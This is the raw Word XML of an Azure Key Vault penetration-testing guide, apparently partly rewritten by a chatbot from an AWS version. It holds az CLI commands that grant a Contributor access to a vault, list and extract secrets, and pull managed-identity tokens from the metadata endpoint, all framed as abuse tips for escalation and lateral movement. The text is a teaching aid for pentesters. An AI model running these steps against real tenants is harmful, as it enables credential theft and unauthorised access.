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AF42" w14:textId="77777777" w:rsidR="0046162E" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Azure Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FFC487" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEE0400" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Key Vault Enumeration &amp; Secret Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C4419" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716D5396" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>List all Key Vaults accessible to current identity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C9FE6" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault list --query "[].name" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEFE83" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify access policies (if you have contributor rights):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D76DE21" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault set-policy --name &lt;vault&gt; --upn &lt;your-user@domain.com&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24345941" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --secret-permissions get list --key-permissions get list \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0750CE1C" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --storage-permissions get list --certificate-permissions get list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FFC431" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumerate and extract secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C16523D" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret list --vault-name &lt;vault-name&gt; --query "[].id" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D97BF" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54934CF5" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t># Extract secret (returns JSON with value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FC334A" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret show --id &lt;secret-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33486105" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABECD10" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Abuse Tip:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you have contributor access, escalate by granting yourself access to keys/secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CDCD43" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66482CEC" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Managed Identity (MSI) Metadata Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F052AA" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>MSI endpoints may expose access tokens usable for resource abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A04A68" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07533AFF" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Get Access Token via Instance Metadata Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0AF97E" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>GET http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://management.azure.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03121ABD" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Header: Metadata: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68986E78" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Useful to impersonate the VM’s identity to access Azure resources like Key Vault, Storage, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2D913" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DE7276" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D9FA6E" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Abuse Scenario: Contributor on Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268EE1B" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If you’re </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Contributor</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a Key Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8358BB" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Add yourself to the Access Policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEFBD05" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Dump all secrets/certs/keys using az or Get-AzKeyVaultSecret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3366C6" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFA7A71" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Additional Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3829F3" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Look for MSI tokens on misconfigured VM web apps or containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE3482" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use tokens to query az rest -m GET -u &lt;url&gt; --headers "Authorization=Bearer $token" for lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2121E9" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRPr="00AA7A70" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider abusing </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>automation accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>runbooks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>logic apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EDACF" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6D39B7" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A804F9" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147AFAA3" w14:textId="77777777" w:rsidR="00C50AE9" w:rsidRDefault="00C50AE9" w:rsidP="00C50AE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591D3A09" w14:textId="25F52E59" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's your </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>corrected, summarized, and rewritten version</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>AWS Secrets Manager &amp; KMS exploitation scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, adapted to </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Key Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51485AE9" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="37DA8A67">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD48F35"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Azure Key Vault – Pentest Guide (Adapted from AWS Secrets Manager/KMS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886DA0A"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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867A026" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Key Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> securely stores </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A77CF02" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>soft-delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>RBAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Access Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for granular control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114D6D93" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Secrets can be exfiltrated if </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>permissions like get, list, or decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are misconfigured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62715ED1" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Keys used in Key Vault (like AWS KMS) can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>symmetric/asymmetric</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and are used to encrypt/decrypt content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F5D88" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
